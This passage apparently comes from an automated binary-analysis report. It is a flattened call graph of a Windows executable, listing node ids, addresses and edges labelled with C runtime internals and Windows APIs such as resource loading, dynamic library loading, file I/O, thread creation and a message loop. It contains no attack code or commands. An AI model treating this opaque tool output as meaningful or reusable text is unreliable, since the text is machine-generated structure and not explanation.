69999->69940 70001 214e8d 70000->70001 70002 214e6e GetProcAddress 70000->70002 70005 214f80 70001->70005 70003 214e7e 70002->70003 70003->70001 70004 214e86 FreeLibrary 70003->70004 70004->70001 70006 214f95 70005->70006 70097 215722 70006->70097 70008 214fa1 __fread_nolock 70009 2150a5 70008->70009 70010 253d1d 70008->70010 70014 214fdc 70008->70014 70100 2142a2 CreateStreamOnHGlobal 70009->70100 70111 28304d 69 API calls 70010->70111 70013 253d22 70016 21511f 59 API calls 70013->70016 70014->70013 70015 2150f5 41 API calls 70014->70015 70020 21506e 70014->70020 70106 21511f 70014->70106 70015->70014 70017 253d45 70016->70017 70018 2150f5 41 API calls 70017->70018 70018->70020 70020->69948 70022 253d70 70021->70022 70023 215107 70021->70023 70133 23e8c4 70023->70133 70026 2828fe 70259 28274e 70026->70259 70028 282919 70028->69955 70031 23e536 __FrameHandler3::FrameUnwindToState 70029->70031 70030 23e544 70054 23f2d9 21 API calls __dosmaperr 70030->70054 70031->70030 70034 23e574 70031->70034 70033 23e549 70055 2427ec 27 API calls pre_c_initialization 70033->70055 70036 23e586 70034->70036 70037 23e579 70034->70037 70046 248061 70036->70046 70056 23f2d9 21 API calls __dosmaperr 70037->70056 70040 23e58f 70041 23e5a2 70040->70041 70042 23e595 70040->70042 70058 23e5d4 LeaveCriticalSection __fread_nolock 70041->70058 70057 23f2d9 21 API calls __dosmaperr 70042->70057 70043 23e554 __wsopen_s 70043->69999 70047 24806d __FrameHandler3::FrameUnwindToState 70046->70047 70059 242f5e EnterCriticalSection 70047->70059 70049 24807b 70060 2480fb 70049->70060 70053 2480ac __wsopen_s 70053->70040 70054->70033 70055->70043 70056->70043 70057->70043 70058->70043 70059->70049 70067 24811e 70060->70067 70061 248177 70078 244c7d 70061->70078 70066 248189 70072 248088 70066->70072 70091 243405 12 API calls 2 library calls 70066->70091 70067->70061 70067->70067 70067->70072 70076 23918d EnterCriticalSection 70067->70076 70077 2391a1 LeaveCriticalSection 70067->70077 70069 2481a8 70092 23918d EnterCriticalSection 70069->70092 70073 2480b7 70072->70073 70096 242fa6 LeaveCriticalSection 70073->70096 70075 2480be 70075->70053 70076->70067 70077->70067 70083 244c8a _unexpected 70078->70083 70079 244cca 70094 23f2d9 21 API calls __dosmaperr 70079->70094 70080 244cb5 RtlAllocateHeap 70081 244cc8 70080->70081 70080->70083 70085 2429c8 70081->70085 70083->70079 70083->70080 70093 234ead 7 API calls 2 library calls 70083->70093 70086 2429fc __dosmaperr 70085->70086 70087 2429d3 HeapFree 70085->70087 70086->70066 70087->70086 70088 2429e8 70087->70088 70095 23f2d9 21 API calls __dosmaperr 70088->70095 70090 2429ee GetLastError 70090->70086 70091->70069 70092->70072 70093->70083 70094->70081 70095->70090 70096->70075 70098 22fddb 23 API calls 70097->70098 70099 215734 70098->70099 70099->70008 70101 2142d9 70100->70101 70102 2142bc FindResourceExW 70100->70102 70101->70014 70102->70101 70103 2535ba LoadResource 70102->70103 70103->70101 70104 2535cf SizeofResource 70103->70104 70104->70101 70105 2535e3 LockResource 70104->70105 70105->70101 70107 21512e 70106->70107 70110 253d90 70106->70110 70112 23ece3 70107->70112 70111->70013 70115 23eaaa 70112->70115 70114 21513c 70114->70014 70119 23eab6 __FrameHandler3::FrameUnwindToState 70115->70119 70116 23eac2 70128 23f2d9 21 API calls __dosmaperr 70116->70128 70118 23eae8 70130 23918d EnterCriticalSection 70118->70130 70119->70116 70119->70118 70120 23eac7 70129 2427ec 27 API calls pre_c_initialization 70120->70129 70123 23eaf4 70131 23ec0a 57 API calls 2 library calls 70123->70131 70125 23eb08 70132 23eb27 LeaveCriticalSection __fread_nolock 70125->70132 70127 23ead2 __wsopen_s 70127->70114 70128->70120 70129->70127 70130->70123 70131->70125 70132->70127 70136 23e8e1 70133->70136 70135 215118 70135->70026 70137 23e8ed __FrameHandler3::FrameUnwindToState 70136->70137 70138 23e900 ___scrt_fastfail 70137->70138 70139 23e92d 70137->70139 70140 23e925 __wsopen_s 70137->70140 70162 23f2d9 21 API calls __dosmaperr 70138->70162 70149 23918d EnterCriticalSection 70139->70149 70140->70135 70142 23e937 70150 23e6f8 70142->70150 70145 23e91a 70163 2427ec 27 API calls pre_c_initialization 70145->70163 70149->70142 70153 23e70a ___scrt_fastfail 70150->70153 70156 23e727 70150->70156 70151 23e717 70228 23f2d9 21 API calls __dosmaperr 70151->70228 70153->70151 70153->70156 70158 23e76a __fread_nolock 70153->70158 70154 23e71c 70229 2427ec 27 API calls pre_c_initialization 70154->70229 70164 23e96c LeaveCriticalSection __fread_nolock 70156->70164 70157 23e886 ___scrt_fastfail 70231 23f2d9 21 API calls __dosmaperr 70157->70231 70158->70156 70158->70157 70165 248d45 70158->70165 70230 23cf78 27 API calls 4 library calls 70158->70230 70162->70145 70163->70140 70164->70140 70166 248d57 70165->70166 70167 248d6f 70165->70167 70232 23f2c6 21 API calls __dosmaperr 70166->70232 70169 2490d9 70167->70169 70174 248db4 70167->70174 70254 23f2c6 21 API calls __dosmaperr 70169->70254 70170 248d5c 70233 23f2d9 21 API calls __dosmaperr 70170->70233 70173 2490de 70255 23f2d9 21 API calls __dosmaperr 70173->70255 70175 248d64 70174->70175 70177 248dbf 70174->70177 70182 248def 70174->70182 70175->70158 70234 23f2c6 21 API calls __dosmaperr 70177->70234 70178 248dcc 70256 2427ec 27 API calls pre_c_initialization 70178->70256 70180 248dc4 70235 23f2d9 21 API calls __dosmaperr 70180->70235 70184 248e08 70182->70184 70185 248e2e 70182->70185 70186 248e4a 70182->70186 70184->70185 70195 248e15 70184->70195 70236 23f2c6 21 API calls __dosmaperr 70185->70236 70239 243820 70186->70239 70189 248e33 70237 23f2d9 21 API calls __dosmaperr 70189->70237 70192 2429c8 _free 21 API calls 70194 248e6a 70192->70194 70193 248e3a 70238 2427ec 27 API calls pre_c_initialization 70193->70238 70199 2429c8 _free 21 API calls 70194->70199 70196 249029 70195->70196 70198 248fcc GetConsoleMode 70195->70198 70200 24902d ReadFile 70196->70200 70198->70196 70201 248fdd 70198->70201 70202 248e71 70199->70202 70203 249047 70200->70203 70204 2490a1 GetLastError 70200->70204 70201->70200 70205 248fe3 ReadConsoleW 70201->70205 70206 248e96 70202->70206 70207 248e7b 70202->70207 70203->70204 70210 24901e 70203->70210 70208 249005 70204->70208 70209 2490ae 70204->70209 70205->70210 70212 248fff GetLastError 70205->70212 70248 249424 29 API calls __wsopen_s 70206->70248 70246 23f2d9 21 API calls __dosmaperr 70207->70246 70213 248e45 __fread_nolock 70208->70213 70249 23f2a3 21 API calls __dosmaperr 70208->70249 70252 23f2d9 21 API calls __dosmaperr 70209->70252 70210->70213 70221 249083 70210->70221 70222 24906c 70210->70222 70212->70208 70214 2429c8 _free 21 API calls 70213->70214 70214->70175 70217 2490b3 70253 23f2c6 21 API calls __dosmaperr 70217->70253 70219 248e80 70247 23f2c6 21 API calls __dosmaperr 70219->70247 70221->70213 70225 24909a 70221->70225 70250 248a61 32 API calls 3 library calls 70222->70250 70251 2488a1 30 API calls __wsopen_s 70225->70251 70227 24909f 70227->70213 70228->70154 70229->70156 70230->70158 70231->70154 70232->70170 70233->70175 70234->70180 70235->70178 70236->70189 70237->70193 70238->70213 70240 24385e 70239->70240 70244 24382e _unexpected 70239->70244 70258 23f2d9 21 API calls __dosmaperr 70240->70258 70241 243849 RtlAllocateHeap 70243 24385c 70241->70243 70241->70244 70243->70192 70244->70240 70244->70241 70257 234ead 7 API calls 2 library calls 70244->70257 70246->70219 70247->70213 70248->70195 70249->70213 70250->70213 70251->70227 70252->70217 70253->70213 70254->70173 70255->70178 70256->70175 70257->70244 70258->70243 70262 23e4e8 70259->70262 70261 28275d 70261->70028 70265 23e469 70262->70265 70266 23e478 70265->70266 70267 23e48c 70265->70267 70281 23f2d9 21 API calls __dosmaperr 70266->70281 70273 23e488 70267->70273 70274 24333f 70267->70274 70270 23e47d 70282 2427ec 27 API calls pre_c_initialization 70270->70282 70273->70261 70283 242fd7 70274->70283 70277 24337e GetSystemTimeAsFileTime 70278 243372 70277->70278 70291 230a8c 70278->70291 70280 23e4a4 __alldvrm 70280->70273 70281->70270 70282->70273 70284 243007 70283->70284 70287 243003 70283->70287 70284->70277 70284->70278 70285 243027 70285->70284 70288 243033 GetProcAddress 70285->70288 70287->70284 70287->70285 70298 243073 70287->70298 70289 243056 70288->70289 70290 243043 __crt_fast_encode_pointer 70288->70290 70289->70284 70290->70284 70292 230a97 IsProcessorFeaturePresent 70291->70292 70293 230a95 70291->70293 70295 230c5d 70292->70295 70293->70280 70305 230c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70295->70305 70297 230d40 70297->70280 70299 243094 LoadLibraryExW 70298->70299 70304 243089 70298->70304 70300 2430b1 GetLastError 70299->70300 70303 2430c9 70299->70303 70301 2430bc LoadLibraryExW 70300->70301 70300->70303 70301->70303 70302 2430e0 FreeLibrary 70302->70304 70303->70302 70303->70304 70304->70287 70305->70297 70311 282e7a 70306->70311 70307 2150f5 41 API calls 70307->70311 70308 282d3b 70308->69962 70308->69980 70309 2828fe 29 API calls 70309->70311 70310 21511f 59 API calls 70310->70311 70311->70307 70311->70308 70311->70309 70311->70310 70313 2822e7 70312->70313 70314 2822d9 70312->70314 70316 28232c 70313->70316 70317 23e5eb 30 API calls 70313->70317 70327 2822f0 70313->70327 70315 23e5eb 30 API calls 70314->70315 70315->70313 70341 282557 70316->70341 70319 282311 70317->70319 70319->70316 70321 28231a 70319->70321 70320 282370 70322 282374 70320->70322 70323 282395 70320->70323 70324 23e678 63 API calls 70321->70324 70321->70327 70326 282381 70322->70326 70329 23e678 63 API calls 70322->70329 70345 282171 70323->70345 70324->70327 70326->70327 70332 23e678 63 API calls 70326->70332 70327->69980 70328 28239d 70330 2823c3 70328->70330 70331 2823a3 70328->70331 70329->70326 70352 2823f3 70330->70352 70334 23e678 63 API calls 70331->70334 70335 2823b0 70331->70335 70332->70327 70334->70335 70335->70327 70336 23e678 63 API calls 70335->70336 70336->70327 70337 2823ca 70338 2823de 70337->70338 70360 23e678 70337->70360 70338->70327 70340 23e678 63 API calls 70338->70340 70340->70327 70342 28257c 70341->70342 70344 282565 __fread_nolock 70341->70344 70343 23e8c4 __fread_nolock 41 API calls 70342->70343 70343->70344 70344->70320 70346 23ea0c ___std_exception_copy 22 API calls 70345->70346 70347 28217f 70346->70347 70348 23ea0c ___std_exception_copy 22 API calls 70347->70348 70349 282190 70348->70349 70350 23ea0c ___std_exception_copy 22 API calls 70349->70350 70351 28219c 70350->70351 70351->70328 70359 282408 70352->70359 70353 2824c0 70377 282724 70353->70377 70354 2821cc 41 API calls 70354->70359 70356 2824c7 70356->70337 70359->70353 70359->70354 70359->70356 70373 282606 70359->70373 70381 282269 41 API calls 70359->70381 70361 23e684 __FrameHandler3::FrameUnwindToState 70360->70361 70362 23e695 70361->70362 70363 23e6aa 70361->70363 70429 23f2d9 21 API calls __dosmaperr 70362->70429 70365 23e6a5 __wsopen_s 70363->70365 70414 23918d EnterCriticalSection 70363->70414 70365->70338 70366 23e69a 70430 2427ec 27 API calls pre_c_initialization 70366->70430 70369 23e6c6 70415 23e602 70369->70415 70371 23e6d1 70431 23e6ee LeaveCriticalSection __fread_nolock 70371->70431 70374 28261d 70373->70374 70375 282617 70373->70375 70374->70359 70375->70374 70382 2826d7 70375->70382 70378 282731 70377->70378 70380 282742 70377->70380 70379 23dbb3 59 API calls 70378->70379 70379->70380 70380->70356 70381->70359 70383 282703 70382->70383 70385 282714 70382->70385 70386 23dbb3 70383->70386 70385->70375 70387 23dbc1 70386->70387 70388 23dbdd 70386->70388 70387->70388 70389 23dbe3 70387->70389 70390 23dbcd 70387->70390 70388->70385 70395 23d9cc 70389->70395 70398 23f2d9 21 API calls __dosmaperr 70390->70398 70393 23dbd2 70399 2427ec 27 API calls pre_c_initialization 70393->70399 70400 23d97b 70395->70400 70397 23d9f0 70397->70388 70398->70393 70399->70388 70401 23d987 __FrameHandler3::FrameUnwindToState 70400->70401 70406 23918d EnterCriticalSection 70401->70406 70403 23d995 70407 23d9f4 70403->70407 70405 23d9a2 __wsopen_s 70405->70397 70406->70403 70408 2449a1 22 API calls 70407->70408 70409 23da09 70408->70409 70410 23da3a 57 API calls 70409->70410 70411 23da24 70410->70411 70412 244a56 57 API calls 70411->70412 70413 23da2f 70412->70413 70413->70405 70414->70369 70416 23e624 70415->70416 70417 23e60f 70415->70417 70423 23e61f 70416->70423 70432 23dc0b 70416->70432 70455 23f2d9 21 API calls __dosmaperr 70417->70455 70419 23e614 70456 2427ec 27 API calls pre_c_initialization 70419->70456 70423->70371 70425 23e640 70440 24862f 70425->70440 70428 2429c8 _free 21 API calls 70428->70423 70429->70366 70430->70365 70431->70365 70433 23dc1f 70432->70433 70434 23dc23 70432->70434 70436 244d7a 70433->70436 70434->70433 70457 2459be 70434->70457 70437 244da1 70436->70437 70438 244d90 70436->70438 70437->70425 70438->70437 70439 2429c8 _free 21 API calls 70438->70439 70439->70437 70441 248653 70440->70441 70442 24863e 70440->70442 70444 24868e 70441->70444 70448 24867a 70441->70448 70583 23f2c6 21 API calls __dosmaperr 70442->70583 70585 23f2c6 21 API calls __dosmaperr 70444->70585 70445 248643 70584 23f2d9 21 API calls __dosmaperr 70445->70584 70580 248607 70448->70580 70449 248693 70586 23f2d9 21 API calls __dosmaperr 70449->70586 70452 23e64c 70452->70423 70452->70428 70453 24869b 70587 2427ec 27 API calls pre_c_initialization 70453->70587 70455->70419 70456->70423 70458 2459ca __FrameHandler3::FrameUnwindToState 70457->70458 70459 2459d2 70458->70459 70460 2459ea 70458->70460 70531 23f2c6 21 API calls __dosmaperr 70459->70531 70461 245a88 70460->70461 70466 245a1f 70460->70466 70535 23f2c6 21 API calls __dosmaperr 70461->70535 70464 2459d7 70532 23f2d9 21 API calls __dosmaperr 70464->70532 70480 245147 EnterCriticalSection 70466->70480 70467 245a8d 70536 23f2d9 21 API calls __dosmaperr 70467->70536 70470 245a25 70472 245a56 70470->70472 70473 245a41 70470->70473 70471 245a95 70537 2427ec 27 API calls pre_c_initialization 70471->70537 70481 245aa9 70472->70481 70533 23f2d9 21 API calls __dosmaperr 70473->70533 70477 245a46 70534 23f2c6 21 API calls __dosmaperr 70477->70534 70478 2459df __wsopen_s 70478->70433 70480->70470 70482 245ad7 70481->70482 70518 245ad0 70481->70518 70483 245afa 70482->70483 70484 245adb 70482->70484 70488 245b4b 70483->70488 70489 245b2e 70483->70489 70544 23f2c6 21 API calls __dosmaperr 70484->70544 70486 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70490 245cb1 70486->70490 70487 245ae0 70545 23f2d9 21 API calls __dosmaperr 70487->70545 70492 245b61 70488->70492 70550 249424 29 API calls __wsopen_s 70488->70550 70547 23f2c6 21 API calls __dosmaperr 70489->70547 70490->70478 70538 24564e 70492->70538 70494 245ae7 70546 2427ec 27 API calls pre_c_initialization 70494->70546 70497 245b33 70548 23f2d9 21 API calls __dosmaperr 70497->70548 70501 245b3b 70549 2427ec 27 API calls pre_c_initialization 70501->70549 70502 245b6f 70507 245b95 70502->70507 70508 245b73 70502->70508 70503 245ba8 70505 245c02 WriteFile 70503->70505 70506 245bbc 70503->70506 70509 245c25 GetLastError 70505->70509 70515 245b8b 70505->70515 70511 245bc4 70506->70511 70512 245bf2 70506->70512 70552 24542e 46 API calls 2 library calls 70507->70552 70513 245c69 70508->70513 70551 2455e1 GetLastError 70508->70551 70509->70515 70511->70513 70511->70515 70520 245bd2 70511->70520 70554 2456c4 7 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 70512->70554 70513->70518 70558 23f2d9 21 API calls __dosmaperr 70513->70558 70515->70513 70515->70518 70522 245c45 70515->70522 70517 245be0 70517->70515 70518->70486 70553 2457a3 7 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 70520->70553 70521 245c8e 70559 23f2c6 21 API calls __dosmaperr 70521->70559 70525 245c60 70522->70525 70526 245c4c 70522->70526 70557 23f2a3 21 API calls __dosmaperr 70525->70557 70555 23f2d9 21 API calls __dosmaperr 70526->70555 70529 245c51 70556 23f2c6 21 API calls __dosmaperr 70529->70556 70531->70464 70532->70478 70533->70477 70534->70478 70535->70467 70536->70471 70537->70478 70540 24565e 70538->70540 70539 245663 70539->70502 70539->70503 70540->70539 70560 242d74 GetLastError 70540->70560 70542 245686 70542->70539 70543 2456a4 GetConsoleMode 70542->70543 70543->70539 70544->70487 70545->70494 70546->70518 70547->70497 70548->70501 70549->70518 70550->70492 70551->70515 70552->70515 70553->70517 70554->70517 70555->70529 70556->70518 70557->70518 70558->70521 70559->70518 70561 242d90 70560->70561 70562 242d8a 70560->70562 70564 244c7d _unexpected 21 API calls 70561->70564 70566 242ddf SetLastError 70561->70566 70563 24320e _unexpected 12 API calls 70562->70563 70563->70561 70565 242da2 70564->70565 70567 242daa 70565->70567 70568 243264 _unexpected 12 API calls 70565->70568 70566->70542 70570 2429c8 _free 21 API calls 70567->70570 70569 242dbf 70568->70569 70569->70567 70571 242dc6 70569->70571 70572 242db0 70570->70572 70573 242be6 _unexpected EnterCriticalSection LeaveCriticalSection 70571->70573 70574 242deb SetLastError 70572->70574 70575 242dd1 70573->70575 70576 2428a7 _abort 36 API calls 70574->70576 70577 2429c8 _free 21 API calls 70575->70577 70578 242df7 70576->70578 70579 242dd8 70577->70579 70579->70566 70579->70574 70588 248585 70580->70588 70582 24862b 70582->70452 70583->70445 70584->70452 70585->70449 70586->70453 70587->70452 70589 248591 __FrameHandler3::FrameUnwindToState 70588->70589 70599 245147 EnterCriticalSection 70589->70599 70591 24859f 70592 2485c6 70591->70592 70593 2485d1 70591->70593 70600 2486ae 70592->70600 70615 23f2d9 21 API calls __dosmaperr 70593->70615 70596 2485cc 70616 2485fb LeaveCriticalSection __wsopen_s 70596->70616 70598 2485ee __wsopen_s 70598->70582 70599->70591 70617 2453c4 70600->70617 70602 2486c4 70630 245333 22 API calls 2 library calls 70602->70630 70603 2486be 70603->70602 70606 2453c4 __wsopen_s 27 API calls 70603->70606 70614 2486f6 70603->70614 70605 24871c 70611 24873e 70605->70611 70631 23f2a3 21 API calls __dosmaperr 70605->70631 70608 2486ed 70606->70608 70607 2453c4 __wsopen_s 27 API calls 70609 248702 CloseHandle 70607->70609 70612 2453c4 __wsopen_s 27 API calls 70608->70612 70609->70602 70613 24870e GetLastError 70609->70613 70611->70596 70612->70614 70613->70602 70614->70602 70614->70607 70615->70596 70616->70598 70618 2453e6 70617->70618 70619 2453d1 70617->70619 70622 23f2c6 __dosmaperr 21 API calls 70618->70622 70624 24540b 70618->70624 70620 23f2c6 __dosmaperr 21 API calls 70619->70620 70621 2453d6 70620->70621 70623 23f2d9 __dosmaperr 21 API calls 70621->70623 70625 245416 70622->70625 70626 2453de 70623->70626 70624->70603 70627 23f2d9 __dosmaperr 21 API calls 70625->70627 70626->70603 70628 24541e 70627->70628 70629 2427ec pre_c_initialization 27 API calls 70628->70629 70629->70626 70630->70605 70631->70611 70632->69917 70633 21dee5 70636 21b710 70633->70636 70637 21b72b 70636->70637 70638 260146 70637->70638 70639 2600f8 70637->70639 70657 21b750 pre_c_initialization 70637->70657 70684 2958a2 196 API calls 2 library calls 70638->70684 70643 260102 70639->70643 70639->70657 70654 21ba20 70643->70654 70683 2961d0 196 API calls 2 library calls 70643->70683 70646 2603d9 70646->70646 70650 21ba4e 70654->70650 70687 28359c 26 API calls 70654->70687 70657->70650 70657->70654 70658 21ec40 70657->70658 70676 21a81b 24 API calls 70657->70676 70677 22a01b 196 API calls 70657->70677 70678 230242 5 API calls __Init_thread_wait 70657->70678 70679 22edcd 23 API calls 70657->70679 70680 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 70657->70680 70681 22ee53 26 API calls 70657->70681 70682 22e5ca 196 API calls 70657->70682 70685 21aceb 24 API calls 70657->70685 70686 26f6bf 24 API calls 70657->70686 70659 21ec76 pre_c_initialization 70658->70659 70661 22fddb 23 API calls 70659->70661 70663 264b0b 70659->70663 70667 21ed9d 70659->70667 70668 230242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 70659->70668 70669 21fbe3 70659->70669 70670 21a961 23 API calls 70659->70670 70673 264beb 70659->70673 70674 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 70659->70674 70675 21f3ae 70659->70675 70688 2201e0 196 API calls _wcslen 70659->70688 70689 2206a0 44 API calls 70659->70689 70661->70659 70691 28359c 26 API calls 70663->70691 70667->70657 70668->70659 70669->70667 70671 264bdc 70669->70671 70669->70675 70670->70659 70692 28359c 26 API calls 70671->70692 70693 28359c 26 API calls 70673->70693 70674->70659 70675->70667 70690 28359c 26 API calls 70675->70690 70676->70657 70677->70657 70678->70657 70679->70657 70680->70657 70681->70657 70682->70657 70683->70654 70684->70657 70685->70657 70686->70657 70687->70646 70688->70659 70689->70659 70690->70667 70691->70667 70692->70673 70693->70667 70694 211044 70697 2110f3 70694->70697 70696 21104a pre_c_initialization 70725 211398 70697->70725 70699 211129 70700 21a961 23 API calls 70699->70700 70701 211174 70700->70701 70702 21a961 23 API calls 70701->70702 70703 21117e 70702->70703 70704 21a961 23 API calls 70703->70704 70705 211188 70704->70705 70706 21a961 23 API calls 70705->70706 70707 2111c6 70706->70707 70708 21a961 23 API calls 70707->70708 70709 211292 70708->70709 70734 21171c 70709->70734 70711 21129c 70712 21a961 23 API calls 70711->70712 70713 2112ce 70712->70713 70714 211325 GetStdHandle 70713->70714 70715 252485 70714->70715 70716 21137a 70714->70716 70715->70716 70717 25248e 70715->70717 70719 211387 OleInitialize 70716->70719 70718 22fddb 23 API calls 70717->70718 70720 252495 70718->70720 70719->70696 70743 28011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 70720->70743 70722 25249e 70744 280944 CreateThread 70722->70744 70724 2524aa CloseHandle 70724->70716 70745 2113f1 70725->70745 70728 2113f1 23 API calls 70729 2113d0 70728->70729 70730 21a961 23 API calls 70729->70730 70731 2113dc 70730->70731 70732 216b57 23 API calls 70731->70732 70733 2113e8 70732->70733 70733->70699 70735 21a961 23 API calls 70734->70735 70736 21172c 70735->70736 70737 21a961 23 API calls 70736->70737 70738 211734 70737->70738 70739 21a961 23 API calls 70738->70739 70740 21174f 70739->70740 70741 22fddb 23 API calls 70740->70741 70742 211772 70741->70742 70742->70711 70743->70722 70744->70724 70752 28092a 6 API calls 70744->70752 70746 21a961 23 API calls 70745->70746 70747 2113fc 70746->70747 70748 21a961 23 API calls 70747->70748 70749 211404 70748->70749 70750 21a961 23 API calls 70749->70750 70751 2113c6 70750->70751 70751->70728 70753 250fe0 70756 24cabc 70753->70756 70757 24cac5 70756->70757 70758 24cace 70756->70758 70760 24c9bb 70757->70760 70761 242d74 _unexpected 39 API calls 70760->70761 70762 24c9c8 70761->70762 70780 24cada 70762->70780 70764 24c9d0 70789 24c74f 70764->70789 70767 243820 _strftime 22 API calls 70768 24c9f8 70767->70768 70779 24ca2a 70768->70779 70796 24cb7c 70768->70796 70771 2429c8 _free 21 API calls 70773 24c9e7 70771->70773 70772 24ca25 70806 23f2d9 21 API calls __dosmaperr 70772->70806 70773->70758 70775 24ca6e 70775->70779 70807 24c625 27 API calls 70775->70807 70776 24ca42 70776->70775 70777 2429c8 _free 21 API calls 70776->70777 70777->70775 70779->70771 70781 24cae6 __FrameHandler3::FrameUnwindToState 70780->70781 70782 242d74 _unexpected 39 API calls 70781->70782 70785 24caf0 70782->70785 70784 24cb74 __wsopen_s 70784->70764 70785->70784 70788 2429c8 _free 21 API calls 70785->70788 70808 2428a7 39 API calls _abort 70785->70808 70809 242f5e EnterCriticalSection 70785->70809 70810 24cb6b LeaveCriticalSection _abort 70785->70810 70788->70785 70811 2349a5 70789->70811 70792 24c770 GetOEMCP 70794 24c799 70792->70794 70793 24c782 70793->70794 70795 24c787 GetACP 70793->70795 70794->70767 70794->70773 70795->70794 70797 24c74f 41 API calls 70796->70797 70798 24cb9b 70797->70798 70801 24cbec IsValidCodePage 70798->70801 70803 24cba2 70798->70803 70805 24cc11 ___scrt_fastfail 70798->70805 70799 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70800 24ca1d 70799->70800 70800->70772 70800->70776 70802 24cbfe GetCPInfo 70801->70802 70801->70803 70802->70803 70802->70805 70803->70799 70818 24c827 GetCPInfo 70805->70818 70806->70779 70807->70779 70809->70785 70810->70785 70812 2349c2 70811->70812 70813 2349b8 70811->70813 70812->70813 70814 242d74 _unexpected 39 API calls 70812->70814 70813->70792 70813->70793 70815 2349e3 _strftime 70814->70815 70817 242ef0 39 API calls _strftime 70815->70817 70817->70813 70819 24c861 70818->70819 70825 24c90b 70818->70825 70826 24641b 70819->70826 70820 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70822 24c9b7 70820->70822 70822->70803 70824 24641b 44 API calls 70824->70825 70825->70820 70827 2349a5 _strftime 39 API calls 70826->70827 70828 24642e 70827->70828 70831 2461fe 70828->70831 70832 246219 70831->70832 70833 24623f MultiByteToWideChar 70832->70833 70834 2463f3 70833->70834 70835 246269 70833->70835 70836 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70834->70836 70839 243820 _strftime 22 API calls 70835->70839 70841 24628a _strftime 70835->70841 70837 246406 70836->70837 70837->70824 70838 2462d3 MultiByteToWideChar 70840 2462ec 70838->70840 70853 24633f 70838->70853 70839->70841 70858 243467 70840->70858 70841->70838 70841->70853 70845 246316 70848 243467 12 API calls 70845->70848 70845->70853 70846 24634e 70847 243820 _strftime 22 API calls 70846->70847 70851 24636f _strftime 70846->70851 70847->70851 70848->70853 70849 2463e4 70866 241537 21 API calls _free 70849->70866 70851->70849 70852 243467 12 API calls 70851->70852 70854 2463c3 70852->70854 70867 241537 21 API calls _free 70853->70867 70854->70849 70855 2463d2 WideCharToMultiByte 70854->70855 70855->70849 70856 246412 70855->70856 70868 241537 21 API calls _free 70856->70868 70859 242fd7 _unexpected 6 API calls 70858->70859 70860 24348e 70859->70860 70863 243497 70860->70863 70869 2434ef 11 API calls 3 library calls 70860->70869 70862 2434d7 LCMapStringW 70862->70863 70864 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70863->70864 70865 2434e9 70864->70865 70865->70845 70865->70846 70865->70853 70866->70853 70867->70834 70868->70853 70869->70862 70870 262a00 70886 21d7b0 70870->70886 70871 21db11 PeekMessageW 70871->70886 70872 21d807 GetInputState 70872->70871 70872->70886 70873 21d9d5 70874 261cbe TranslateAcceleratorW 70874->70886 70876 21db8f PeekMessageW 70876->70886 70877 21da04 timeGetTime 70877->70886 70878 21db73 TranslateMessage DispatchMessageW 70878->70876 70879 21dbaf Sleep 70894 21dbc0 70879->70894 70880 262b74 Sleep 70880->70894 70881 261dda timeGetTime 71012 22e300 24 API calls 70881->71012 70882 22e551 timeGetTime 70882->70894 70885 262c0b GetExitCodeProcess 70889 262c37 CloseHandle 70885->70889 70890 262c21 WaitForSingleObject 70885->70890 70886->70871 70886->70872 70886->70873 70886->70874 70886->70876 70886->70877 70886->70878 70886->70879 70886->70880 70886->70881 70897 21ec40 196 API calls 70886->70897 70901 21dfd0 70886->70901 70920 221310 70886->70920 70961 21bf40 70886->70961 71011 22edf6 IsDialogMessageW GetClassLongW 70886->71011 71013 28359c 26 API calls 70886->71013 70887 262742 70891 26274a 70887->70891 70888 2a29bf GetForegroundWindow 70888->70894 70889->70894 70890->70886 70890->70889 70892 262c92 Sleep 70892->70886 70894->70882 70894->70885 70894->70886 70894->70887 70894->70888 70894->70892 71014 295658 24 API calls 70894->71014 71015 27e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 70894->71015 71016 27d4dc 28 API calls 70894->71016 70897->70886 70903 21e010 70901->70903 70902 21ec40 196 API calls 70912 21e0dc pre_c_initialization 70902->70912 70903->70912 71019 230242 5 API calls __Init_thread_wait 70903->71019 70906 21e3e1 70906->70886 70907 262fca 70909 21a961 23 API calls 70907->70909 70907->70912 70908 21a961 23 API calls 70908->70912 70910 262fe4 pre_c_initialization 70909->70910 71020 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 70910->71020 70912->70902 70912->70906 70912->70908 70914 28359c 26 API calls 70912->70914 70917 2204f0 23 API calls 70912->70917 71017 21a81b 24 API calls 70912->71017 71018 22a308 196 API calls 70912->71018 71021 230242 5 API calls __Init_thread_wait 70912->71021 71022 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 70912->71022 71023 2947d4 202 API calls 70912->71023 71024 2968c1 210 API calls 70912->71024 70914->70912 70917->70912 70921 2217b0 70920->70921 70922 221376 70920->70922 71215 230242 5 API calls __Init_thread_wait 70921->71215 70924 266331 70922->70924 70928 221390 70922->70928 71219 29709c 196 API calls 70924->71219 70926 26633d 70926->70886 70927 2217fb 70930 266346 70927->70930 70931 22182c 70927->70931 70928->70927 70929 2213ec 70928->70929 70929->70930 70937 221408 